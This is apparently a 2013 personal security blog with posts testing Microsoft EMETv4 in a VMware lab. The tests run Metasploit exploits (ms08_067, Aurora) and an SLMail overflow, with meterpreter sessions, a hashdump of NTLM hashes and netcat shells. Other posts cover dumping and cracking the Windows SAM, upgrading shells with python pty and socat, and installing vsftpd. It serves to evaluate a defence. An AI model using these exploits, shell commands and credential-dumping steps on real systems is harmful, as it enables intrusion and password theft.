[*] Meterpreter session 1 opened (192.168.34.132:33899 -> 192.168.34.135:1091) at 2013-06-19 20:11:50 +0200

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
268 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
316 268 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
340 268 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
388 340 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
400 340 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
568 388 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
588 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
760 388 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
816 388 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
872 388 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
888 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1160 888 wmiadap.exe x86 0 NT AUTHORITY\SYSTEM \\?\C:\WINDOWS\system32\WBEM\WMIADAP.EXE
1164 388 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1200 388 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
1284 388 cisvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\cisvc.exe
1344 388 dfssvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\Dfssvc.exe
1376 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1460 388 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
1480 388 ismserv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\ismserv.exe
1500 388 ntfrs.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\ntfrs.exe
1624 388 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1664 388 SLadmin.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLadmin\SLadmin.exe
1788 388 SLSmtp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLmail\slsmtp.exe
1848 388 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1876 388 tcpsvcs.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tcpsvcs.exe
1964 388 SLMail.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLmail\SLmail.exe
2104 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
2336 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
2404 388 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
2464 388 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
2612 388 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
2644 588 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2824 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
3060 588 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
3380 3352 explorer.exe x86 0 HP\Administrator C:\WINDOWS\Explorer.EXE
3444 2404 TPAutoConnect.exe x86 0 HP\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
3488 3380 vmtoolsd.exe x86 0 HP\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3596 388 msiexec.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\msiexec.exe
3924 888 wuauclt.exe x86 0 HP\Administrator C:\WINDOWS\system32\wuauclt.exe
4016 3560 EMET_Agent.exe x86 0 HP\Administrator C:\Program Files\EMET 4.0\EMET_Agent.exe

meterpreter > sysinfo
Computer : HP-SRV01
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >

The target is powned. Take a look at the process number 4016: 4016 3560 EMET_Agent.exe
The EMET_Agent is running but the exploit still works.

Test 5
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2008-4250 (IE6)
Exploit used: ms10_002_aurora from metasploit
EMET agent: installed with recommended settings.

I setup the exploit exactly as test 2 but this time EMET works well and stops me.
When I start IE6 on the target machine and point to the evil page the aurora exploit cause the crash of Internet Exploter as wished. so I restart the target machine and retry: same result, IE6 crash. I want to double check this and I exclude iexplorer.exe from EMEC configuration and this time the exploit has worked.

This is a drow: exploit 1 – EMEC 1.

Test 6
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2003-0264 (slmail55_4433)
Exploit used: my version of this well known exploit
EMET agent: installed with recommended settings.

Also in this case, with defaul settings the exploit works:

root@bt:~# nc 192.168.34.134 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>tasklist
tasklist

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 236 K
smss.exe 540 Console 0 388 K
csrss.exe 604 Console 0 4,172 K
winlogon.exe 628 Console 0 5,032 K
services.exe 672 Console 0 3,348 K
lsass.exe 684 Console 0 1,532 K
vmacthlp.exe 844 Console 0 2,328 K
svchost.exe 860 Console 0 4,860 K
svchost.exe 944 Console 0 4,348 K
svchost.exe 1036 Console 0 18,140 K
svchost.exe 1092 Console 0 3,340 K
svchost.exe 1224 Console 0 4,236 K
spoolsv.exe 1536 Console 0 5,568 K
explorer.exe 1556 Console 0 18,664 K
vmtoolsd.exe 1688 Console 0 13,560 K
SLadmin.exe 2020 Console 0 3,076 K
SLSmtp.exe 272 Console 0 4,720 K
vmtoolsd.exe 324 Console 0 11,396 K
TPAutoConnSvc.exe 312 Console 0 3,868 K
wscntfy.exe 1368 Console 0 1,964 K
alg.exe 1816 Console 0 3,416 K
TPAutoConnect.exe 2448 Console 0 4,048 K
wuauclt.exe 3200 Console 0 5,048 K
SLMail.exe 564 Console 0 4,940 K
msiexec.exe 3768 Console 0 8,256 K
EMET_Agent.exe 3752 Console 0 27,960 K
cmd.exe 3988 Console 0 2,432 K
tasklist.exe 3980 Console 0 4,076 K
wmiprvse.exe 1628 Console 0 5,528 K

C:\Program Files\SLmail\System>hostname
hostname
hp-cli01

C:\Program Files\SLmail\System>ipconfig | findstr Address ipconfig | findstr Address
IP Address. . . . . . . . . . . . : 192.168.34.134

C:\Program Files\SLmail\System>

Again, after a reboot, EMET doesn’t stop the attack, so I try to adjust some settings. If I modify the profile template from “recommended” to “maximum” and reboot, EMET doesn’t allow the execution of code: the DEP block the execution from the address space. I double check it and retry my attack with basic settings: the exploit is not stopped. Also in this case let’s take 2 steps back and debug the application while EMET is blocking the execution (Image1)

Image 1

The overflow works, writing “A” up to the overwriting of the EIP but when it has to execute the payload it is stopped with message “Access violanion when executing 01C7A154”. That is actualy the address where my payload start to be executed.

Conclusions
I consider the EMET idea extremly useful and I think that this program, if implemented, will be able to increase the system security. Nowaday the bigest problems, from my viewpoint, are:
– not all moules are present and activated (SEHOP e ASLR)
– not all installed programs are controlled by default
– On my tests, on Windows XP, I have a problem with the EMET_agent when start the GUI (image2) and when I reboot (image3).
– I would be happier if FrameWork4 is not a requirement.

Image 2

Image 3

In this situation I will never install this program on a production server, but I will surely follow it, waiting for its evolutions.

EMETv4 – Part 1

Peru — Thu, 20 Jun 2013 12:00:56 +0000

The theory
Microsoft has relased the full edition of the free software EMETv4 “Enhanced Mitigation Experience Toolkit”. The Company puts together some tecnologies such ASLR and DEP to mitigate the risk of system hacking; first of all the “Zero day” attacks. This, thanks to DEP and ASLR, will not only patch Microsoft software, but all software installed. The DEP (Data Execution Prevention) is a technology that associates services or applications to non-executable memory region and blocks code executions from this area (buffer overflow). The ASLR (Address space layout randomization) randomize the address that the application use. If someone bypass the buffer overflow protection and write a script to exploit it, the return address he has to overwrite in the instruction pointer register (EIP or RIP) to redirect the exploit to the payload, is everytime different. This makes considerably more difficult the replica of the exploit.
Well, this is what I understand…therefore there is no other options, I have to test it.

The practice
I will test 3 attacks:
– To Operating system vulnerability (SMB)
– To Microsoft software (IE6)
– To non Microsoft Software (SLMail)

Target machines:
– Windows XP SP3 eng (Host Name: HP-CLI01; IP Address: 192.168.34.134)
– Windows Server 2003 SP2 eng (Host Name: HP-Srv01; IP Address: 192.168.34.135)

Attack machine:
– Linux BackTrack 5R2 (Host Name: bt; IP Address: 192.168.34.132)

Note that both Operating systems and vulnerability are rather old. I use these because I hope that EMET will work well on known exploits, better than with unknown one. So let’s start the phase 1: system without EMETv4.

Test 1
Target: Windows Server 2003 SP2 eng; Host Name: HP-Srv01; IP Address: 192.168.34.135
Vulnerability: CVE-2008-4250 (SMB)
Exploit used: ms08_067_netapi from metasploit

Look at the Metasploit Framework Consolle running on Linux machine:

msf exploit(ms08_067_netapi) > info

Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 16002
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great

Provided by:
hdm
Brett Moore
staylor
jduck

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.34.135 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 8 characters

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.

References:
https://cvedetails.com/cve/2008-4250/
https://www.osvdb.org/49243
https://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
https://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.132:33899
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 2 opened (192.168.34.132:33899 -> 192.168.34.135:1089) at 2013-06-18 16:23:06 +0200

meterpreter > shell
Process 3792 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name: HP-SRV01
OS Name: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Uniprocessor Free
Registered Owner: hp
Registered Organization: hp
Product ID: 69713-650-3699384-45501
Original Install Date: 1/20/2013, 12:26:37 AM
System Up Time: 0 Days, 0 Hours, 6 Minutes, 5 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3466 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory: 511 MB
Available Physical Memory: 305 MB
Page File: Max Size: 1,044 MB
Page File: Available: 844 MB
Page File: In Use: 200 MB
Page File Location(s): C:\pagefile.sys
Domain: hp.local
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: Q147222
[02]: SP1 - SP
[03]: KB914961 - Service Pack
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.34.254
IP address(es)
[01]: 192.168.34.135

C:\WINDOWS\system32>

Test 1 succesfull

Test 2
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2008-4250 (IE6)
Exploit used: ms10_002_aurora from metasploit

On the Linux machine I start a http server with evil page (https://192.168.34.132:8080/evil) using Metasploit:

Module options (exploit/windows/browser/ms10_002_aurora):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH /evil no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.34.132 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.34.132:4444
[*] Using URL: https://0.0.0.0:8080/evil
[*] Local IP: https://192.168.34.132:8080/evil
msf exploit(ms10_002_aurora) > [*] Server started.
...
...

Now in the target machine I start Internet Explorer 6, browse to the evil page and the msf consolle continues:

...
...
[*] 192.168.34.134 ms10_002_aurora - Sending Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (752128 bytes) to 192.168.34.134
[*] Meterpreter session 1 opened (192.168.34.132:4444 -> 192.168.34.134:1145) at 2013-06-18 17:00:56 +0200

msf exploit(ms10_002_aurora) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 HP-CLI01\user @ HP-CLI01 192.168.34.132:4444 -> 192.168.34.134:1145 (192.168.34.134)

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : HP-CLI01
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5d193c1fc3224fbbbc410375cbf57593:cb30aaad8dc109ef9521bfa868237ee3:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9fc1f511ad19c511fd4e162ca71fd236:::
user:1003:22124ea690b83bfbaad3b435b51404ee:57d583aa46d571502aad4bb7aea09c70:::

meterpreter > shell
Process 220 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>systeminfo
systeminfo

Host Name: HP-CLI01
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: honeypot
Registered Organization: honeypot
Product ID: 76487-640-1479176-23404
Original Install Date: 1/23/2013, 11:06:09 AM
System Up Time: 0 Days, 0 Hours, 9 Minutes, 4 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3465 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory: 511 MB
Available Physical Memory: 38 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use: 40 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\HP-CLI01
Hotfix(s): 5 Hotfix(s) Installed.
[01]: File 1
[02]: File 1
[03]: Q147222
[04]: KB942288-v3 - Update
[05]: KB954550-v5 - Update
NetWork Card(s): 1 NIC(s) Installed.
[01]: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.34.254
IP address(es)
[01]: 192.168.34.134

C:\Documents and Settings\user\Desktop>

Test 2 succesfull

Test 3
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2003-0264 (slmail55_4433)
Exploit used: my version of this well known exploit

Take a look at the target machine:

C:\Documents and Settings\user>ipconfig | findstr Address
IP Address. . . . . . . . . . . . : 192.168.34.134

C:\Documents and Settings\user>hostname
hp-cli01

C:\Documents and Settings\user>netstat /na | findstr LISTENING
TCP 0.0.0.0:25 0.0.0.0:0 LISTENING
TCP 0.0.0.0:79 0.0.0.0:0 LISTENING
TCP 0.0.0.0:106 0.0.0.0:0 LISTENING
TCP 0.0.0.0:110 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:180 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1034 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1028 0.0.0.0:0 LISTENING
TCP 127.0.0.1:8376 0.0.0.0:0 LISTENING
TCP 192.168.34.134:139 0.0.0.0:0 LISTENING

Now, let’s run the exploit from the attacker machine and re-run netstat

C:\Documents and Settings\user>netstat /na | findstr LISTENING
TCP 0.0.0.0:25 0.0.0.0:0 LISTENING
TCP 0.0.0.0:79 0.0.0.0:0 LISTENING
TCP 0.0.0.0:106 0.0.0.0:0 LISTENING
TCP 0.0.0.0:110 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:180 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1034 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1028 0.0.0.0:0 LISTENING
TCP 127.0.0.1:8376 0.0.0.0:0 LISTENING
TCP 192.168.34.134:139 0.0.0.0:0 LISTENING

The payload of the exploit was a bind shell on port 4444, indeed a TCP listener is now working this port.
On the Linux machine I am able to connect to this listener a get a remore shell:

root@bt:~# nc -v 192.168.34.134 4444
192.168.34.134: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.34.134] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>systeminfo
systeminfo

Host Name: HP-CLI01
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: honeypot
Registered Organization: honeypot
Product ID: 76487-640-1479176-23404
Original Install Date: 1/23/2013, 11:06:09 AM
System Up Time: 0 Days, 0 Hours, 32 Minutes, 0 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3466 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory: 511 MB
Available Physical Memory: 299 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use: 40 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 5 Hotfix(s) Installed.
[01]: File 1
[02]: File 1
[03]: Q147222
[04]: KB942288-v3 - Update
[05]: KB954550-v5 - Update
NetWork Card(s): 1 NIC(s) Installed.
[01]: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.34.254
IP address(es)
[01]: 192.168.34.134

C:\Program Files\SLmail\System>

The following screenshot is the exploit in acrion:

Image 1

Let’s go back of some steps and debug the exploit and look at image 2.

Image 2

The EIP is overwritten after 4654 bytes of space (\x41 ASCII A) and, in the 4 bytes of the EIP (\x42 ASCII B), I will put the return address ‘\x53\x93\x42\x7E’ that will point to exact space address of user32.dll. This will surelly work only under the same OS version (every Windows XP sp3 eng); that is where the user32.dll version and address space is the same.
If I understend how EMET works, it will often change the spece address of user32.dll de facto invalidating the exploit. Or better causing the application crash.

[end of phase 1] Take a look at the [phase 2]

SAM dump and Windows password decrypt.

Peru — Tue, 18 Jun 2013 13:29:06 +0000

The Windows passwords are stored and crypted in the SAM file (c:\windows\system32\config\). In the same folder you can find the key to decrypt it: the file SYSTEM. This two files are locked by the kernel when the operating system is up, so to backup it and decrypt you have to use some bootable linux distro, to mount the disk when the system is down or to use some program like fgdump, pwdump or meterpreter hashdump. Someone told me even that is possible to copy this files causing a Blue Sceen of Death an then remotely dump files, but I never try it.

An alternative, when the operating system is working, is to take the two twins files present in folder c:\windows\repair\ that the system create as a backup. This work up to Windows XP (think also Vista), but I can’t be able to find these files on Windows7. If you know something more, write me.

Once you have the files you use bkhive to extract the bootkey:

bkhive /mnt/ntfs/Windows/System32/config/SYSTEM /tmp/bootkey

Then put together the bootkey and the SAM file:

samdump2 /mnt/ntfs/Windows/System32/config/SAM /tmp/bootkey > /tmp/hash.txt

And then try to crack the hash:

john --format=NT /tmp/hash.txt

This is just an exemple of use of this tools. To crack hash you can algo use google that is always the bigest resource.

From a non interactive shell to an interactive one

Peru — Tue, 18 Jun 2013 10:08:59 +0000

As you can read at the end of this post a remote shell using command execution (-e cmd.exe or /bin/bash) isn’t a full interactive command prompt.
These are solutions I found to have a more stable shell. Note that I don’t talk about a web remote shell as c99, c100, weevely or other php/asp code that need a web server. Also I don’t want to talk about MSFvenom and similar, but I focused on something similar to NC or SSH.

The target is a Linux system.
Using Pyton:
After you get a Netcat remote shell execute

python -c 'import pty; pty.spawn("/bin/bash");'

This is non completly interactive, but is better than before.

Is Better to use socat that is a more complex variant of netcat.
Listener:

socat file:`tty`,raw,echo=0 tcp-listen:8999

Client:

socat tcp:127.0.0.1:8999 exec:"bash -li",pty,stderr,setsid,sigint,sane

This is a full interactive remote shell

The target is a Windows system.
I suppose that in Microsoft environment you don’t have pyton or socat, although the two programs have Windows binary.
So the better way I found is to start a telnet server. Googling I found some stand alone programs like TelnetD. Note that isn’t a free software, but you can try it using the Trial Version.

Install ftp server on Kali Linux

Peru — Thu, 13 Jun 2013 12:16:34 +0000

This is a simple how to install vsftpd server on Kali Linux. The more important configuration file is /etc/vsftpd.conf. Read carefully it and refer to vsftpd home site.

Download and install vsftpd:

root@kali:~# apt-get install vsftpd

If you want to allow local users to log in and to allow ftp uploads you have to edit file /etc/vsftpd.conf uncommenting the following:

local_enable=YES
write_enable=YES

Also set this parameters:

chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list

To secure your server, disable anonymous access if not required:

anonymous_enable=NO

If you wish you can also modify the banner present in vsftpd.conf, but this is usefull only to prevent simple banner grabbing. A specific tool such as NMAP will discover your server version anyway.

Now create the file /etc/vsftpd.chroot_list and add the local users you want allow to connect to FTP server.
Start service and test connections:

root@kali:~# service vsftpd start
Starting FTP server: vsftpd.
root@kali:~# netstat -nat | grep 21
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
root@kali:~# ftp 127.0.0.1
Connected to 127.0.0.1.
220 (vsFTPd 2.3.5)
Name (127.0.0.1:root): user-one
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>